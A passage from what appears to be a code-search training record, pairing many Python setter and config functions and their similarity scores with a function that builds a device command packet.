"def set(self, value):\n # We can't store the values in the given format, we need to convert\n # them in string first. We also need to validate the value type.\n\n parser_map = {\n 'integer': int,\n 'numeric': float,\n 'date': dateutil_parser.parse,\n 'datetime': dateutil_parser.parse,\n 'keyboardshortcut': json.dumps\n }\n\n error_map = {\n 'keyboardshortcut': 'keyboard shortcut'\n }\n\n try:\n if self._type in ('boolean', 'switch', 'node'):\n assert isinstance(value, bool)\n elif self._type == 'options':\n has_value = next((True for opt in self.options\n if 'value' in opt and opt['value'] == value),\n False)\n assert (has_value or (self.select2 and self.select2['tags']))\n elif self._type == 'date':\n value = parser_map[self._type](value).date()\n else:\n value = parser_map.get(self._type, lambda v: v)(value)\n if self._type == 'integer':\n value = self.normalize_range(value)\n assert isinstance(value, int)\n if self._type == 'numeric':\n value = self.normalize_range(value)\n assert (\n isinstance(value, int) or isinstance(value, float) or\n isinstance(value, decimal.Decimal))\n except Exception as e:\n current_app.logger.exception(e)\n return False, gettext(\n \"Invalid value for {0} option.\".format(\n error_map.get(self._type, self._type)))\n\n pref = UserPrefTable.query.filter_by(\n pid=self.pid\n ).filter_by(uid=current_user.id).first()\n\n value = \"{}\".format(value)\n if pref is None:\n pref = UserPrefTable(\n uid=current_user.id, pid=self.pid, value=value\n )\n db.session.add(pref)\n else:\n pref.value = value\n db.session.commit()\n\n return True, None",
"def pythonvalue(self, value):\n return value in (\"true\", \"1\")",
"def _set_guc_onoff(self, name, value):\n if isinstance(value, six.string_types) and \\\n value.lower() in (b'default', 'default'):\n value = 'default'\n else:\n value = 'on' if value else 'off'\n self._set_guc(name, value)",
"def setenumerated(self, strcommand, value):\n command = ct.c_wchar_p(strcommand)\n value = ct.c_bool(value)\n self.lib.AT_SetEnumerated(self.AT_H, command, value)",
"def light(self, value: bool | int, /) -> None:",
"def _registerBoolPropertyInPEM27(name, is_visible, defval):\n import uSysDB\n con = uSysDB.connect()\n cur = con.cursor()\n cur.execute(\n \"INSERT INTO confman_parameters (name, type, is_visible, user_id) VALUES (%s, %s, %s, %s)\",\n (name, 0, int(is_visible), 1))\n prop_id = uSysDB.get_last_inserted_value(con, \"confman_parameters\")\n cur.execute(\n \"INSERT INTO confman_bool_parameters (parameter_id, value, vlimit) VALUES (%s, %s, %s)\",\n (prop_id, int(defval), -1))",
"def set_value(self, value: ScalarType) -> None:\n if isinstance(value, bool):\n value_str = 'true' if value else 'false'\n else:\n value_str = str(value)\n start_mark = self.yaml_node.start_mark\n end_mark = self.yaml_node.end_mark\n # If we're of a class type, then we want to keep that tag so that the\n # correct Constructor is called. If we're a built-in type, set the tag\n # to the appropriate YAML tag.\n tag = self.yaml_node.tag\n if tag.startswith('tag:yaml.org,2002:'):\n tag = scalar_type_to_tag[type(value)]\n new_node = yaml.ScalarNode(tag, value_str, start_mark, end_mark)\n self.yaml_node = new_node",
"def SetValue(self, *args):\n return _BRepAlgo.BRepAlgo_DataMapNodeOfDataMapOfShapeBoolean_SetValue(self, *args)",
"def setValue(self,val):\n if self.isCheckable():\n self.setChecked(val)",
"def test_getboolean(self):\n self.assertEqual(self.config.getboolean('advanced','bool'),True)",
"def __init__(self, boolean_name, boolean_value):\n self._boolean_name = process_for_latex(boolean_name)\n self._boolean_value = boolean_value",
"def set_enabled(self, newval):\n rest_val = \"1\" if newval > 0 else \"0\"\n return self._setAttr(\"enabled\", rest_val)",
"def set_bool_attribute(self, id: str, b: Optional[bool]):\n self.set_attribute(id, None if not b else ConstInt(1))",
"def test_getboolean_with_default(self):\n self.assertEqual(self.config.getboolean('advanced','p'),None)\n self.assertEqual(self.config.getboolean('advanced','p',True),True)",
"def setValue(self,val):\n if val:\n self.input.setValue(val)",
"def __init__(self, val: bool) -> None:\n if type(val) != bool:\n raise TypeError(f\"Invalid literal {val} with type '{val.__class__.__name__}' for parameter 'val'\")\n self._val: bool = val\n return",
"def new_value(self, value):\n\n def set_relay_mode(momentary_mode_on, momentary_follow_sense, momentary_on_off):\n \"\"\"Set the values of the underlying properties.\"\"\"\n self._momentary_mode_on_prop.new_value = momentary_mode_on\n self._momentary_follow_sense_prop.new_value = momentary_follow_sense\n self._momentary_on_off_trigger_prop.new_value = momentary_on_off\n\n if value is None:\n set_relay_mode(None, None, None)\n return\n\n relay_mode = RelayMode(int(value))\n if relay_mode == self.value:\n set_relay_mode(None, None, None)\n return\n\n if relay_mode == RelayMode.LATCHING:\n set_relay_mode(False, False, False)\n elif relay_mode == RelayMode.MOMENTARY_A:\n set_relay_mode(True, False, False)\n elif relay_mode == RelayMode.MOMENTARY_B:\n set_relay_mode(True, False, True)\n elif relay_mode == RelayMode.MOMENTARY_C:\n set_relay_mode(True, True, False)",
"def set_config(param, value):\n _config = loadConfig()\n _paramField = rgetattr(_config, param)\n # define types that can be cast from command line input\n primitive = (int, str, bool)\n\n def is_primitiveType(_type):\n return _type in primitive\n\n # cast type\n if type(_paramField) == type(Union) and is_primitiveType(type(_paramField).__args__[0]):\n value = type(_paramField).__args__[0](value)\n elif is_primitiveType(type(_paramField)):\n value = type(_paramField)(value)\n\n try:\n rsetattr(_config, param, value)\n except TypeError as err:\n click.echo(err)\n saveConfig(_config)",
"def cbSetConfig( InfoType, BoardNum, DevNum,\n ConfigItem, ConfigVal ):\n CHK( cbw.cbSetConfig( InfoType, BoardNum, DevNum, ConfigItem, ConfigVal ) )",
"def __int__(self):\n flags = self._analog_input_mode\n flags = set_bit(flags, 2, self._send_on_sensor_alarm)\n flags = set_bit(flags, 3, self._send_on_input_port_change)\n flags = set_bit(flags, 4, self._enable_1_wire_port)\n flags = set_bit(flags, 5, self._enable_all_link_aliasing)\n flags = set_bit(flags, 6, self._send_on_output_port_change)\n flags = set_bit(flags, 7, self._enable_output_timers)\n return flags",
"def testConfigC(self):\n assert type(self.config['debug']) == bool, \"Not parsing string to boolean correctly\"",
"def convert_boolean(cls, param, value):\r\n return True",
"def __init__(self, value, extra=None):\n if not isinstance(value, bool):\n raise TypeError(\n 'Passed value must be a bool. %s found instead.' % type(value))\n\n self._value = value\n self._extra = extra",
"def getSetBoolean(self, key: str, default: bool | None = None) -> bool:\n value = self.parsedConfig.getboolean(key, default)\n self.parsedConfig[key] = str(value)\n return value",
"def set_signal_active(self, bool_value):\n self.chkbtn_signal_active.set(bool_value)",
"def set(self, value): # interface for BlueSky plans\n if str(value).lower() not in (\"fly\", \"taxi\", \"return\"):\n msg = \"value should be either Taxi, Fly, or Return.\"\n msg + \" received \" + str(value)\n raise ValueError(msg)\n\n if self.busy.value:\n raise RuntimeError(\"spin is operating\")\n\n status = DeviceStatus(self)\n \n def action():\n \"\"\"the real action of ``set()`` is here\"\"\"\n if str(value).lower() == \"taxi\":\n self.taxi()\n elif str(value).lower() == \"fly\":\n self.pre_fly()\n self.fly()\n self.post_fly()\n elif str(value).lower() == \"return\":\n self.motor.move(self.return_position)\n\n def run_and_wait():\n \"\"\"handle the ``action()`` in a thread\"\"\"\n self.busy.put(True)\n action()\n self.busy.put(False)\n status._finished(success=True)\n \n threading.Thread(target=run_and_wait, daemon=True).start()\n return status",
"def on_off_bool(value):\n return value == 'on'",
"def set_fan_mode(self, value):\n return self.parent.controller.set_fan_auto_mode(value)",
"def state(self, value, duration=None):\n if value in ['off', 'OFF', '0']:\n self.off()\n if value in ['on', 'ON', '1']:\n self.on(duration)",
"def BIT(self, value):\n result = self.reg.A & value\n self.reg.N = result >> 7\n self.reg.V = result >> 6 & 1\n self.reg.Z = result == 0",
"def set_bit(self, port, bit):\n hw = self.device.peripherals[port]\n hw.BSRR.wr(1 << (bit & 15))",
"def set_value (self):\n raise NotImplementedError",
"async def greeter_toggle(self, ctx, value: bool):\n await queries.update_setting(ctx, \"greeter_settings\", \"is_enabled\", value)\n if value:\n await util.send_success(ctx, \"Greeter is now **enabled**\")\n else:\n await util.send_success(ctx, \"Greeter is now **disabled**\")",
"def log(self, value):\n\n if isinstance(value, bool) or value is None:\n self.__log = value",
"def set_custom_value(self, value):\n self.logger.info(\"Set custom value : %s\" % value)\n\n try:\n self._answer_payload['custom_value'] = value\n except Exception as e:\n self.logger.error(\"Error on set custom variables : %s\" % e)",
"def cast(self, value: Any) -> Any:\n if value is None:\n return False\n if isinstance(value, bool):\n return value\n strvalue = str(value).lower()\n if strvalue in ['1', 't', 'true']:\n return True\n elif strvalue in ['', '0', 'f', 'false']:\n return False\n raise err.InvalidArgumentError(\"not a Boolean '{}'\".format(value))",
"def update_neutron_advanced_configuration(self, option, value):\n attributes = self.nailgun_client.get_cluster_attributes(\n self.cluster_id)\n nac_subdict = attributes['editable']['neutron_advanced_configuration']\n nac_subdict[option]['value'] = value\n self.nailgun_client.update_cluster_attributes(\n self.cluster_id, attributes)",
"def set_switch(self, value):\n act = SwitchAction(self, value)\n return act.invoke()",
"def set_has_fan(self, value: bool = True):\r\n self._logger.info(log_message_formatter(\r\n \"set\", f\"{self}\", \"has_fan\", value))\r\n self._has_fan = value",
"def eflags_set(self, bit: int, value: bool) -> None:\n if self.eflags_get(bit):\n if not value:\n self.eflags &= ~(1 << bit)\n else:\n if value:\n self.eflags |= 1 << bit",
"def write_bool(self, b: bool) -> None:\n self.buffer += struct.pack(\"<?\", b)",
"def __set_mode(self, value):\n # update Nuke\n localization.setMode(str(value.lower()))\n # update panel UI\n logger.debug('disabling pause button: %s', value=='Off')\n # if the localization mode is off diasble pause and force widgets\n self.pauseBtn.setDisabled(value == 'Off')\n self.updateBtn.setDisabled(value == 'Off')\n self.__update_pause_icon()",
"def setSinglePush(self, bool_value):\n self.data_struct['__singlePush'] = bool_value",
"def set_value(self, key, value=None,\n options=None, option_index=None, hidden=None):\n if key not in self:\n self.set_param(key, value,\n options=options,\n option_index=option_index)\n if options is not None:\n self[key]['options'] = options\n if value is None and option_index is None:\n option_index = self[key]['option_index']\n if option_index is not None:\n value = self[key]['options'][option_index]\n self[key]['option_index'] = option_index\n elif value is not None and self[key]['options'] is not None:\n try:\n option_index = self[key]['options'].index(value)\n self[key]['option_index'] = option_index\n except ValueError:\n pass\n elif self[key]['dtype'] == 'bool':\n if str(value).lower().strip() in FALSY:\n value = False\n else:\n value = True\n self[key]['value'] = value\n if hidden is not None:\n self[key]['hidden'] = hidden",
"def SetValue(self, val):\n \n for c in self.choices:\n if val == c.GetLabel():\n c.SetValue(True)\n break",
"def test_set_property_success(self):\r\n self.config.option1 = 9001\r\n self.assertEqual(self.config.values['option1'], 9001)\r\n\r\n self.config.option2 = 'bar'\r\n self.assertEqual(self.config.values['option2'], 'bar')",
"def SetDebugMode(self, debug):\n config = ConfigParser.ConfigParser()\n config.read(self.app_conf)\n config.set(\"Settings\", \"debug_mode\", debug)\n configfile = open(self.app_conf, \"w\")\n config.write(configfile)\n self.debug_mode = misc.to_bool(debug)\n self.wifi.debug = self.debug_mode\n self.wired.debug = self.debug_mode",
"def set_debug_mode(self, value):\n self.debug = value",
"def cbDConfigBit( BoardNum, PortNum, BitNum, Direction ):\n CHK( cbw.cbDConfigBit( BoardNum, PortNum, BitNum, Direction ) )",
"def force_bool(value):\n if isinstance(value, (bool, int)):\n return bool(value)\n\n boolean_states = ConfigParser._boolean_states\n if not value.lower() in boolean_states:\n return None\n\n return boolean_states[value.lower()]",
"def strict_logical(self, value):\n if value is not None:\n if not isinstance(value, bool):\n raise TypeError(\n 'f90nml: error: strict_logical must be a logical value.')\n else:\n self._strict_logical = value",
"def _setForDocument (self, value):\n if not isinstance(value, bool):\n raise TypeError(value)\n self.__forDocument = value\n return value"
] | [
"0.69975346",
"0.66105807",
"0.6431443",
"0.641337",
"0.63824916",
"0.63277537",
"0.6307116",
"0.6288704",
"0.6275827",
"0.6273386",
"0.62682843",
"0.6259129",
"0.6229773",
"0.6222815",
"0.6199952",
"0.615967",
"0.6145829",
"0.61051655",
"0.6090899",
"0.6050174",
"0.6049057",
"0.6039881",
"0.6026596",
"0.5985286",
"0.5979112",
"0.5961897",
"0.59396976",
"0.59132636",
"0.5895424",
"0.58844036",
"0.5839223",
"0.58250225",
"0.5797858",
"0.5758652",
"0.5748404",
"0.5748404",
"0.5733895",
"0.5691167",
"0.56896245",
"0.56892306",
"0.5683847",
"0.567265",
"0.56687325",
"0.5663382",
"0.56547636",
"0.56479955",
"0.56473845",
"0.56085896",
"0.55976725",
"0.559697",
"0.5573783",
"0.55681336",
"0.5555656",
"0.5553306",
"0.5544345",
"0.5544153",
"0.5537421",
"0.5537247",
"0.5526337",
"0.55109507",
"0.5500634",
"0.54976475",
"0.54888934",
"0.5474677",
"0.54617244",
"0.54503065",
"0.544974",
"0.54457915",
"0.5445326",
"0.5440578",
"0.5425748",
"0.5420176",
"0.54112756",
"0.5401528",
"0.5401215",
"0.53993845",
"0.5385274",
"0.5383725",
"0.53801626",
"0.5378208",
"0.5375075",
"0.53659856",
"0.5365154",
"0.536464",
"0.53645027",
"0.53626025",
"0.5359946",
"0.5352904",
"0.53521043",
"0.53517926",
"0.5345224",
"0.5342684",
"0.5341021",
"0.53387207",
"0.5336776",
"0.5335524",
"0.53131545",
"0.5303368",
"0.5302889",
"0.53005004"
] | 0.7702449 | 0 |
Calls base class and sets the options. | def __init__(self):
super(t_var_size_Options, self).__init__()
self.options = {
t_var_size_Options.BOARD_ID : {'value' : '', 'name' : 'board_id' },
t_var_size_Options.CURRENT_STATE : {'value' : '', 'name' : 'state' },
t_var_size_Options.PATTERN_WAVE : {'value' : '', 'name' : 'pat_wav' }
} | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def __init__(self, **options):\n self.options = options",
"def set_options(self, options):\n self.options = options",
"def initialize_options(self):",
"def initialize(self, options):",
"def initialize_options(self):\n pass",
"def initialize_options(self):\n pass",
"def initialize_options(self):\n pass",
"def set_options(self, options):\n self.options = options",
"def __init__(self, **user_options):\n self.options = config.default_options.copy()\n self.configure(**user_options)",
"def options(self, options):\n\n self._options = options",
"def options(self, options):\n\n self._options = options",
"def cmdLineOptions(self):\n\t\tself.opts = Options()\n\t\tself.opts.process()\n\t\treturn self",
"def _create_options(self):\n self._OPTIONS = {}",
"def set(cls,options):\n cls.instance = Options(options)",
"def _options(self):\n return",
"def __init__(self, **options):\n self.__dict__.update(\n (k, v) for (k, v) in options.items() if not k.startswith('__'))",
"def __init__(self, **kwargs):\n\n self.opts = {}\n self.opts.update(kwargs)\n self._v_registry = {}",
"def options(self, *args, **kwargs):\n self.request(\"options\", *args, **kwargs)",
"def initialize_options(self):\n self.all = False\n self.coverage = False\n super(test, self).initialize_options()",
"def configure(self, options, conf):",
"def options_set(self):\n\n global OPTIONS\n OPTIONS.append(config.ENABLE(self.threaded))\n OPTIONS.append(config.ENABLE(self.datasaver))\n OPTIONS.append(self.language)",
"def __init__(self):\n self.config = get_config()\n self.options, self.arguments = get_options(self.config)\n if self.get_bool(\"cache\") and self.get_bool(\"cache_search\") \\\n and not self.get_bool(\"longlist\"):\n integrate_search_cache(\n self.config,\n self.get(\"cachedir\"),\n self.get(\"setpath\")\n )\n if not self.arguments:\n if \"id\" in self.options.__dict__ \\\n and self.options.__dict__[\"id\"]:\n self.arguments.append( self.options.__dict__[\"id\"] )\n del( self.options.__dict__[\"id\"] )\n import sys\n message = \"WARNING: the --id option is deprecated and will eventually be removed\\n\"\n sys.stderr.write(message)\n elif \"city\" in self.options.__dict__ \\\n and self.options.__dict__[\"city\"] \\\n and \"st\" in self.options.__dict__ \\\n and self.options.__dict__[\"st\"]:\n self.arguments.append(\n \"^%s city, %s\" % (\n self.options.__dict__[\"city\"],\n self.options.__dict__[\"st\"]\n )\n )\n del( self.options.__dict__[\"city\"] )\n del( self.options.__dict__[\"st\"] )\n import sys\n message = \"WARNING: the --city/--st options are deprecated and will eventually be removed\\n\"\n sys.stderr.write(message)",
"def __init__(self, **kwargs):\n\n self.options = {**self.DEFAULTS, **kwargs}\n self.engine = self.start_matlab_engine()\n self.spm_directory = self.get_spm_directory()",
"def __init__(self, terminal):\r\n super(CustomOptions, self).__init__()\r\n self.longdesc = \"\"\r\n self.terminal = terminal",
"def __init__(self, options=None):\n if options is None:\n options = {}\n # do we need any options for import behavior, such as 'create references', 'use PK', 'resolve DRS', etc?\n defaults = {}\n self.options = {**defaults, **options}",
"def __init__(self, options: DownloaderOptions):\n self.options = options",
"def init_opt(self):\n raise NotImplementedError",
"def init_opt(self):\n raise NotImplementedError",
"def init_opt(self):\n raise NotImplementedError",
"def init_opt(self):\n raise NotImplementedError",
"def initialize_options(self):\n self.base_dir = getcwd()\n self.output_dir = getcwd()\n self.release = None\n self.tag_prefix = 'v'\n self.version = VERSION",
"def main(self, options):\n raise NotImplementedError",
"def __init__(self, values = None):\n TCInit(self)\n if values is not None:\n self.set_opts(values)",
"def setup(self, optparser):\n\t\tpass",
"def _generate_options(self, **kwargs: Any) -> dict:\n raise NotImplementedError",
"def initialize_options(self):\n\n super().initialize_options()\n self.react_interface = None",
"def initialize_options(self):\n self.all = None",
"def options(self, parser):\n pass",
"def set_options(self, **options):\n self.source = options['source'] or settings.MEDIA_ROOT\n self.container = options['container'] or ls.AZURE_DEFAULT_CONTAINER\n self.verbosity = int(options.get('verbosity', 1))\n ignore_patterns = options['ignore_patterns']\n if options['use_default_ignore_patterns']:\n ignore_patterns += ['.*', '*~']\n self.ignore_patterns = list(set(ignore_patterns))\n self.dir = options['dir']",
"def register_options(cls, register):",
"def configure(self, *args, **kwargs):\n raise NotImplementedError()",
"def configure(self, *args, **kwargs):\n raise NotImplementedError()",
"def configure(self, *args, **kwargs):\n raise NotImplementedError()",
"def initialize_options(self):\n self.proto_path = \"oef-core-protocol\"",
"def setclsoptions(cls, tmpcls, session):\n if len(optionsdict[tmpcls]['OPTIONS']) == 0:\n ret = tmpcls().options(session)\n if not utils.is_failed_resp(ret):\n optionsdict[tmpcls]['OPTIONS'] = ret",
"def configure(self, options, conf):\n pass",
"def finalize_options(self):",
"def finalize_options(self):",
"def __init__(self, **kwargs):\n # Call superclass\n super().__init__(**kwargs)",
"def options(self, parser, env):\n pass",
"def setOptions(self):\n self.parser.add_option(\"--jobid\",\n dest=\"jobid\",\n default=None,\n type=\"int\",\n help=\"Optional id of the job you want to execute locally\")\n\n self.parser.add_option(\"--enableStageout\",\n dest=\"enableStageout\",\n default=False,\n action=\"store_true\",\n help=\"After the job runs copy the output file on the storage destination\")\n\n self.parser.add_option(\"--destdir\",\n dest=\"destdir\",\n default=None)",
"def setup(self, options, results):",
"def common_options(self, common_options):\n self._common_options = common_options",
"def __init__(self):\n self._opts = {} # dict of dicts of (opt:, override:, default:)\n self._groups = {}\n self._deprecated_opts = {}\n\n self._args = None\n\n self._oparser = None\n self._namespace = None\n self._mutable_ns = None\n self._mutate_hooks = set([])\n self.__cache = {}\n self.__drivers_cache = {}\n self._config_opts = []\n self._cli_opts = collections.deque()\n self._validate_default_values = False\n self._sources = []\n self._ext_mgr = None\n # Though the env_driver is a Source, we load it by default.\n self._use_env = True\n self._env_driver = _environment.EnvironmentConfigurationSource()\n\n self.register_opt(self._config_source_opt)",
"def _CommonOptions(self, p):\n super()._CommonOptions(p, opt_v=False)",
"def add_base_options(self):\n for option in self.base_options:\n self.add_option(*option.get_option_names(), **option.kwargs)",
"def ParseOptions(cls, options, config_object):",
"def __init__(self, config_file=None):\n\t\tself.options = {}\n\n\t\tif config_file:\n\t\t\tself.set_file(config_file)",
"def __init__(self, base, **kwargs):\n self.base = base",
"def __init__( self, **kwargs ):\n self.__dict__.update( kwargs )",
"def configure(self):\n warnings.warn(\"No options to configure for \" + self.__class__.__name__)",
"def _init(self, options):\n self._initRuntime(options)\n self._loadConfig() # needs runtime\n self._initGeneral() # needs _config\n self._initGroups() # needs _config and general",
"def __init__(self, **kwargs):\n self.__dict__.update(kwargs)",
"def __init__(self, **kwargs):\n self.__dict__.update(kwargs)",
"def set_options(*args, **kwargs):\n for option in kwargs:\n if option not in BasePlan.options:\n raise BadOption('%s is not a valid, must be a combination '\n 'of %s' % (option, ','.join(BasePlan.options.keys(),)))\n BasePlan.options.update(kwargs)",
"def handle(self, options, global_options, *args):\r\n raise NotImplementedError()",
"def prepare(self, **options):\r\n raise NotImplementedError",
"def __new__(meta, name, bases, class_attributes):\r\n class_attributes, options = meta.find_options(class_attributes)\r\n class_attributes['options'] = options\r\n cls = super(ConfigBase, meta).__new__(meta, name, bases, class_attributes)\r\n for opt_name, option in options.iteritems():\r\n opt_get = functools.partial(cls.get_value, name=opt_name, option=option, presentation=True)\r\n opt_set = functools.partial(cls._set_value, name=opt_name, option=option)\r\n setattr(cls, opt_name, property(opt_get, opt_set))\r\n return cls",
"def setOptions(self, options):\n assert isinstance(options, list);",
"def __init__(self, opt):\n # init will store opt into the object.\n super().__init__(opt)\n\n # variable is tripped once a model is requested to save.\n self.save_trip = False",
"def __init__(self):\n self._create_options()\n self._create_sections()",
"def add_options(cls, parser):\n pass",
"def configure(self, **options):\r\n if self._wrapped != None:\r\n raise RuntimeError('Settings already configured.')\r\n holder = BaseSettings()\r\n for name, value in options.items():\r\n setattr(holder, name, value)\r\n self._wrapped = holder",
"def _default_options(cls) -> Options:\n options = super()._default_options()\n\n options.curve_fitter = multi_curve_fit\n options.data_processor = None\n options.normalization = False\n options.x_key = \"xval\"\n options.plot = True\n options.axis = None\n options.xlabel = None\n options.ylabel = None\n options.xlim = None\n options.ylim = None\n options.xval_unit = None\n options.yval_unit = None\n options.result_parameters = None\n options.return_data_points = False\n options.curve_plotter = \"mpl_single_canvas\"\n options.style = PlotterStyle()\n\n # automatically populate initial guess and boundary\n fit_params = cls._fit_params()\n options.p0 = {par_name: None for par_name in fit_params}\n options.bounds = {par_name: None for par_name in fit_params}\n\n return options",
"def __init__(self, **options):\n\n super().__init__()\n\n self._enabled = options.get('cors_enabled')\n self._always_send = options.get('cors_always_send')\n self._allowed_origins = options.get('cors_allowed_origins')\n self._exposed_headers = options.get('cors_exposed_headers')\n self._allowed_headers = options.get('cors_allowed_headers')\n self._allow_credentials = options.get('cors_allow_credentials')\n self._max_age = options.get('cors_max_age')",
"def __init__(self, prompt, options):\n self.prompt = prompt\n self.options = options",
"def __init__(self):\n self.__parser=OptionParser(option_class=MyOption)\n self.__source=''\n self.__dest=''\n self.__all=False\n self.__inv=False\n self.__tree=''\n self.__authpath=''\n self.__verbose=False",
"def __init__(self, **kwargs):\n super().__init__(kwargs)",
"def __init__(self, **kwargs):\n super().__init__(kwargs)",
"def __init__(self, options):\n\n StagerBase.__init__(self, options, None)\n self._build_revision = self._chromium_revision",
"def setoptions(cls, session):\n newlist = list(clslist)\n list(map(lambda x: cls.setclsoptions(x, session), newlist))",
"def _default_options(cls):\n default_options = super()._default_options()\n default_options.data_processor = dp.DataProcessor(\n input_key=\"counts\",\n data_actions=[dp.Probability(\"1\"), dp.BasisExpectationValue()],\n )\n default_options.plotter.set_figure_options(\n xlabel=\"Flat top width\",\n ylabel=\"Pauli expectation values\",\n xval_unit=\"s\",\n ylim=(-1, 1),\n )\n default_options.data_subfit_map = {\n \"x\": {\"meas_basis\": \"x\"},\n \"y\": {\"meas_basis\": \"y\"},\n \"z\": {\"meas_basis\": \"z\"},\n }\n\n return default_options",
"def setupParserOptions(self):\n\t\tapDisplay.printError(\"you did not create a 'setupParserOptions' function in your script\")\n\t\traise NotImplementedError()",
"def __init__(self, cmd):\n # Build command + options \n self.cmd = cmd \n setattr(self, 'command', \"%s\" % (cmd))",
"def configure(self, *args):\n raise NotImplementedError(self, \"configure\")",
"def __post_init__(self, pluginOptions: Optional[dict[str, RuntimeOptionValue]]) -> None:\n if pluginOptions:\n existingBaseOptions = sorted(\n optionName\n for optionName in pluginOptions.keys()\n if hasattr(self, optionName)\n )\n if existingBaseOptions:\n raise RuntimeOptionsException(_('Provided plugin options already exist as base options {}').format(existingBaseOptions))\n for optionName, optionValue in pluginOptions.items():\n setattr(self, optionName, optionValue)\n if (self.entrypointFile is None and\n not self.proxy and\n not self.plugins and\n not pluginOptions and\n not self.webserver):\n raise RuntimeOptionsException(_('Incorrect arguments'))\n if self.webserver and not hasWebServer():\n raise RuntimeOptionsException(_(\"Webserver option requires webserver module\"))\n if self.webserver and any((\n self.entrypointFile, self.importFiles, self.diffFile, self.versReportFile,\n self.factsFile, self.factListCols, self.factTableFile, self.factTableCols,\n self.relationshipCols, self.conceptsFile, self.preFile, self.tableFile, self.calFile,\n self.dimFile, self.anchFile, self.formulaeFile, self.viewArcrole, self.viewFile,\n self.roleTypesFile, self.arcroleTypesFile\n )):\n raise RuntimeOptionsException(_('Incorrect arguments with webserver'))",
"def __init__(self, options=None):\n super().__init__()\n self.logger.debug(\"Creating %s arch\", self.name)\n self.option_settings = {o: False for o in self.option_names}\n if options:\n assert isinstance(options, tuple)\n for option_name in options:\n assert option_name in self.option_names\n self.option_settings[option_name] = True\n self.asm_printer = AsmPrinter()",
"def setOptions(self):\n self.parser.add_option( \"--outputdir\",\n dest = \"outdir\",\n default = None,\n help = \"Directory to write JSON summary to.\" )\n\n self.parser.add_option( \"--dbs\",\n dest = \"usedbs\",\n default = 'no',\n help = \"Use information in DBS to build the input lumi lists and the output lumi lists.\"+\\\n \" Allowed values are yes/no. Default is no.\" )",
"def __init__(self, *args, **kwargs):\n super(self.__class__, self).__init__(*args, **kwargs)",
"def __validate_options__(cls, options):\n pass",
"def options(self):\n return self.__options",
"def __init__(self, **kwargs):\n super().__init__(**kwargs)",
"def __init__(self, **kwargs):\n super().__init__(**kwargs)",
"def __init__(self, **kwargs):\n super().__init__(**kwargs)",
"def __init__(self, **kwargs):\n super().__init__(**kwargs)",
"def __init__(self, ignored_args = [], **common_options):\n self.ignored_args = ignored_args\n self.common_options = self._fix_argparse_dicts(common_options)",
"def __init__(self, options=None):\n if options is None:\n options = {}\n self.verbosity = options.get(\"verbosity\", 0)\n self.format = options.get(\"format\", \"grid\")\n self.server = options.get(\"server\", None)\n\n self.charset_map = None\n\n if self.server:\n self.charset_map = self.server.exec_query(_CHARSET_QUERY)",
"def __init__(self, options):\n self.options = options\n self.model = Q_Trader(options)\n self.datasmith = make_data.MakeData(options)\n self.reset()",
"def __init__(self, optv):\n self.__p4optv = optv\n # Treat '-g' like '-G' except the marshal'ed Python dicts\n # will be unmarshal'ed.\n if '-g' in self.__p4optv:\n self.__p4optv[self.__p4optv.index('-g')] = '-G'\n self.__unmarshal = 1\n else:\n self.__unmarshal = 0\n # Drop '-s'. 'p4' implements this on the client side and so\n # should 'px' (XXX though it does not yet), so the option should\n # not be passed to the server.\n if '-s' in self.__p4optv:\n self.__p4optv.remove('-s')\n log.warn(\"dropping '-s' option, px cannot yet handle it\")\n _ListCmd.__init__(self)",
"def add_options(self, parser):\n pass"
] | [
"0.77025074",
"0.7662632",
"0.7593163",
"0.7496479",
"0.7381808",
"0.7353797",
"0.7353797",
"0.71979177",
"0.71634424",
"0.7015553",
"0.7015553",
"0.7015013",
"0.6925202",
"0.68997306",
"0.683711",
"0.6774097",
"0.6744283",
"0.6743406",
"0.6712053",
"0.6625223",
"0.65894604",
"0.65881455",
"0.65850544",
"0.6566034",
"0.65433615",
"0.6529545",
"0.65226483",
"0.65226483",
"0.65226483",
"0.65226483",
"0.65171134",
"0.6501442",
"0.64913356",
"0.64792895",
"0.6477148",
"0.64769965",
"0.6451197",
"0.643889",
"0.6410815",
"0.63811785",
"0.63477314",
"0.63477314",
"0.63477314",
"0.63464993",
"0.6341114",
"0.6332209",
"0.63185745",
"0.63185745",
"0.6313834",
"0.62849814",
"0.6255908",
"0.623813",
"0.62337077",
"0.6223183",
"0.62153465",
"0.62133753",
"0.619589",
"0.61945647",
"0.6192764",
"0.61848193",
"0.6184323",
"0.61825705",
"0.6177179",
"0.6177179",
"0.6171666",
"0.6168999",
"0.61675185",
"0.6165713",
"0.61639273",
"0.6131982",
"0.6124039",
"0.61212796",
"0.61210597",
"0.6118545",
"0.6099317",
"0.6085287",
"0.6084321",
"0.6081508",
"0.6081508",
"0.60777503",
"0.60763526",
"0.6067949",
"0.6062917",
"0.60500556",
"0.6046491",
"0.6034073",
"0.60250485",
"0.6016009",
"0.6014855",
"0.6005906",
"0.5999214",
"0.59984165",
"0.59984165",
"0.59984165",
"0.59984165",
"0.599342",
"0.5981618",
"0.5970565",
"0.59662884",
"0.5965931"
] | 0.6098035 | 75 |
Builds a command packet | def build_command_packet(self, command):
packet = bytearray()
# All option fields are 0
packet.append(0)
packet.append(0)
packet.append(0)
packet.append(command)
return packet | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def _build_command(self, command_name, hardware_address = '', comp_var_dict = None):\n # Start command adn set name\n command = \"<Command><Name>{command_name}</Name>\".format(command_name=command_name)\n\n if hardware_address:\n command += \"<DeviceDetails><HardwareAddress>{hardware_address}</HardwareAddress></DeviceDetails>\".format(hardware_address=hardware_address)\n\n if comp_var_dict is not None:\n comp_keys = comp_var_dict.keys()\n if len(comp_keys) > 0:\n for comp_key in comp_keys:\n # Build requested variable list\n command += \"<Components><Component><Name>{comp_key}</Name><Variables>\".format(comp_key=comp_key)\n variables = comp_var_dict[comp_key]\n for var in variables:\n command += \"<Variable><Name>{var}</Name></Variable>\".format(var=var)\n command += \"</Variables></Component></Components>\"\n else:\n # Request all variables from all components\n command += \"<Components><All>Y</All></Components>\"\n\n # Close command\n command += \"</Command>\"\n \n return command",
"def _build_command(self, cmd, unit):\n return '#' + unit + cmd + NEWLINE",
"def _build_send_optode_command(self, cmd, command):\n return \"%s=%s%s\" % (cmd, command, self._newline)",
